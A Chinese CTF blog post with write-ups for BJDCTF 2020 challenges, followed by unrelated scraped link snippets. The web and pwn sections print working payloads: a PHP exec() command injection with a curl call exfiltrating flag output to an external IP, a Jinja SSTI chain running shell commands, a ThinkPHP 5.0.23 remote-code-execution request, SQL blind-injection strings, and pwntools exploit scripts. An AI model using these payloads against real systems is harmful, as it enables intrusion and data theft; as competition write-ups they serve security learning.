title: BJDCTF 2020 刷题记录
categories:

  • CTF
    tags:
  • BJDCTF
  • CTF2020

BJDCTF

Web

duangShell

根据提示,输入.index.php.swp下载到源码。

之后在linux内输入vim -r index.php.swp即可看到源码

 <!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <title>give me a girl</title>

</head>

<body>

    <center><h1>珍爱网</h1></center>

</body>

</html>

<?php

error_reporting(0);

echo "how can i give you source code? .swp?!"."<br>";

if (!isset($_POST['girl_friend'])) {

    die("where is P3rh4ps's girl friend ???");

} else {

    $girl = $_POST['girl_friend'];

    if (preg_match('/\>|\\\/', $girl)) {

        die('just girl');

    } else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {

        echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";

    } else {

        //duangShell~~~~

        exec($girl);

    }

}

curl -X POST --data “head /flag” 174.1.51.13:88

用curl带出flag

fake google

ssti模板注入

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}

即可读取flag

old-hack

根据主页提示是thinkphp5

访问目录/index.php?s=captcha

得知详细版本为

5.0.23

去网上百度漏洞。

发现以下漏洞。直接利用得到flag。

POST /index.php?s=captcha HTTP/1.1

Host: 45a2092a-fa59-4b90-9c4c-55eec2662d02.node3.buuoj.cn

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Connection: close

Upgrade-Insecure-Requests: 1

Content-Length: 79

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag

简单注入

通过扫描器扫描到/hint.txt

打开后为

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

过滤了select,=,’ 等字符

username通过输入\ 可以逃逸字符串

password = or ascii(substr(password,1,1))>78#

布尔盲注,一个一个测,测出密码

账号测得admin

or LENGTH(password)>12# 测得密码为12位

密码正在测

OhyOuFOuNdit

输入后获得flag

Misc

题最简单的misc-y1ng

简单的伪加密winhex破解一下然后发现了文件,发现是

IHDR 是png的格式,然后加一个表头,出现图片破解一下

42 4A 44 7B 79 31 6E 67 7A 75 69 73 68 75 61 69 7D

BJD{y1ngzuishuai}

Real_EasyBaBa

内藏压缩包,发现压缩包就是一个陷阱,无用,就看到了奇怪的很整齐的代码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GZWP28er-1584954919873)(https://i.loli.net/2020/03/23/WvVZuGmBAiCxRHf.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4Dz8MWQ5-1584954919873)(https://i.loli.net/2020/03/23/KGRjZmrfQ35BphL.png)]

发现是一个矩阵图 BJD{572154976}

EasyBaBa

发现图片其实是zip,解压发现,文件打不开,发现是视频发现视频中的二维码


修复了一下

61 67 69 6E 5F 6C 6F 76 65 5F 59 42 4A 44 7B 69 6D 31 6E 67 7D

agin_love_YBJD{im1ng}

重新组一下词语

BJD{imagin_love_Y1ng}

圣火昭昭-y1ng

新佛曰:諸壽隸僧壽降吽壽諸壽陀壽摩隸僧缽薩願心壽咤壽囉寂壽闍諸壽哆壽慧壽聞壽色吽愍壽所壽蜜如

破解

gemlovecom

A_Beautiful_Picture

CRC爆破脚本跑他

发现高度被修改,winhex修改一下

BJD{PnG_He1ghT_1s_WR0ng}

Crypto

签到-y1ng

题目给出一段编码,一看就知道是base64,于是base64解密得flagflag:BJD{W3lc0me_T0_BJDCTF}

cat_flag

一组小猫吃饭团的是0 吃鸡腿的是1 按此排列出一串二进制01000010

01001010

01000100

01111011

01001101

00100001

01100001

00110000

01111110

01111101

在转成十六进制,从十六进制在转成字符串

即可得到flag:BJD{M!a0~}

老文盲

BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}

燕言燕语-y1ng

题目是79616E7A69205A4A517B78696C7A765F6971737375686F635F73757A6A677D20

转成字符串为yanzi ZJQ{xilzv_iqssuhoc_suzjg}

维吉尼亚密码解得BJD{yanzi_jiushige_shabi}

Reverse

guessgame

IDEA打开即可

PWN

one_gadget

题目说明

题目提示one_gadget

下载它的2.29libc,并one_gadget命令找一下libc里面的gadget

解题思路

exp:

from pwn import*

context.log_level = 'debug'

#p= process('./one_gadget')

p = remote('node3.buuoj.cn',25747)

libc = ELF('./libc-2.29.so')

p.recvuntil('for u:')

printf_addr = p.recv(14)

printf_addr = eval(printf_addr)

log.success('printf_addr==>'+hex(printf_addr))

base = printf_addr - libc.symbols["printf"]

one_gadget = base + 0x106ef8

#gdb.attach(p)

p.sendlineafter('gadget:',str(one_gadget))

p.interactive()

r2t3

解题思路

整数溢出

from pwn import*

#context.log_level = 'debug'

#p = process('./r2t3')

p =remote('node3.buuoj.cn',28270)

p.recvuntil('name:\n')

payload = 'A'*(0x11+4)+p32(0x0804858B)

payload = payload.ljust(260,'a')

#gdb.attach(p,'b *0x080485E9')

p.sendline(payload)

p.interactive()

snake_dyn

玩贪吃蛇。3000 2333


完~~~~~~~~~~谢谢观看

BJDCTF-2020-WRITEUP---TiKi小组的更多相关文章

  1. 湖湘杯2020 writeup

    这个平台中间卡的离谱,卡完过后交了flag分还掉了 Web 题目名字不重要 也算是非预期吧,赛后y1ng师傅也说了因为要多端口环境必须这样配,预期解很难 NewWebsite 后台弱口令admin a ...

  2. 刷题记录:[V&N2020 公开赛]TimeTravel

    题目复现链接:https://buuoj.cn/challenges 参考链接:2020 年 V&N 内部考核赛 WriteUp V&N公开赛2020 writeup httpoxy ...

  3. 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup

    2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download/jameswhit ...

  4. 三叶草极客大挑战2020 部分题目Writeup

    三叶草极客大挑战2020 部分题目Writeup Web Welcome 打开后状态码405,555555,然后看了一下报头存在请求错误,换成POST请求后,查看到源码 <?php error_ ...

  5. #2020征文-手机#深鸿会深大小组:HarmonyOS手机游戏—数字华容道

    目录: 前言 概述 正文 创建项目 实现初始界面布局 实现数字的随机打乱 实现滑动或点击调换数字 实现游戏成功界面 结语 源码包 前言 12月16号HarmonyOS2.0手机开发者Beta版已经发布 ...

  6. 2020新春公益赛 writeup

    简单的招聘系统 无需注册账号,admin'or 1#登陆,到blank page页面,在输入key处发现有注入点: /pages-blank.php?key=1%27+union+select+1%2 ...

  7. Chive CTF 2020 - Tiki

    题目状态: OPEN - 正在试图解这道题CLOSED - 这道题还没有打开SOLVED - 解决了!鼓掌撒花! 赛事信息: 起止时间:2020-04-09 01:00 ~ 2020-04-12 01 ...

  8. ISITDTU CTF 2020 部分Web题目Writeup

    周末,跟着m3w师傅打ISITDTUCTF,m3w师傅带弟弟上分,Tql! Web1 给了源码: <?php class Read{ public $flag; public function ...

  9. 【网鼎杯2020朱雀组】Web WriteUp

    nmap nmap语法,很简单. 127.0.0.1' -iL /flag -oN vege.txt ' phpweb 打开,抓包,发现可以传递函数和其参数 试了一下很多函数都被过滤了,不能执行系统命 ...

随机推荐

  1. ProxySQL简介原理及读写分离应用

    MySQL-ProxySQL中间件简介 同类型产品 MySQL Route:是现在MySQL官方Oracle公司发布出来的一个中间件. Atlas:是由奇虎360公发的基于MySQL协议的数据库中间件 ...

  2. Jquery封装: 地区选择联动插件

    请点击下载百度云链接: 链接: https://pan.baidu.com/s/1plVmdJT2O4fLJokyJDQA2g 密码: aqt2

  3. 如何快速修改/替换GIF的背景?

    案例是将白色背景换成另一个颜色的背景.图是某女同事百度上搜到的,共有83个图层. 若是Windows系统的,Ctrl = Command 若是要换背景图,而不是纯色背景,步骤一样,只需将那个填充颜色的 ...

  4. SQL Beautifier & SQL2014自带的格式化工具

    格式化工具(希望有几款集成在IDE中的格式化工具)为什么要说明这些,不是为说明这个工具而发,看到那几千行或集成在一起的存储过程觉得乱七八的不爽,后面将会强力训练下自己. --下面这款SQL Beaut ...

  5. spark源码解析总结

    ========== Spark 通信架构 ========== 1.spark 一开始使用 akka 作为网络通信框架,spark 2.X 版本以后完全抛弃 akka,而使用 netty 作为新的网 ...

  6. (二)POI-创建一个sheet页,并添加行列数据

    原文:https://blog.csdn.net/class157/article/details/92800439 1.只创建sheet页 package com.java.poi; import ...

  7. 说说硬件中核心板的作用和优缺点,基于i.MX8M Mini核心处理器平台

    核心板,顾名思义,即硬件构成中关键的器件和电路打包封装的一块电子主板,具有布线复杂.多层.高频信号干扰.器件密度高等特性,大多数核心板集成了处理器.内存.存储器.电源管理和引脚,通过引脚与配套基板连接 ...

  8. 在android项目中使用FontAwesome字体

    在android项目中使用FontAweSome图标集,可以方便的适配各种屏幕分辨率,不必在各种不同分辨率文件夹中新建资源文件.使用字体是一种很巧妙的方法,把图像以字体的方式呈现,这样以前设置为and ...

  9. java中Proxy类初探

    在java中提供了一个动态代理类,这个类位于java.lang.reflect包中的Proxy类中.什么是动态代理类呢?就是可以在运行时创建一个实现了一组给定接口的新类.听上去有点高深的样子,其实是提 ...

  10. IOS App破解之路一 拿到appstore上的ipa

    1,  在Mac电脑上的app store里搜索Apple Configurator2 并安装 2, iPhone手机连接Mac电脑 3, 登录Apple Configurator2 菜单栏,  账号 ...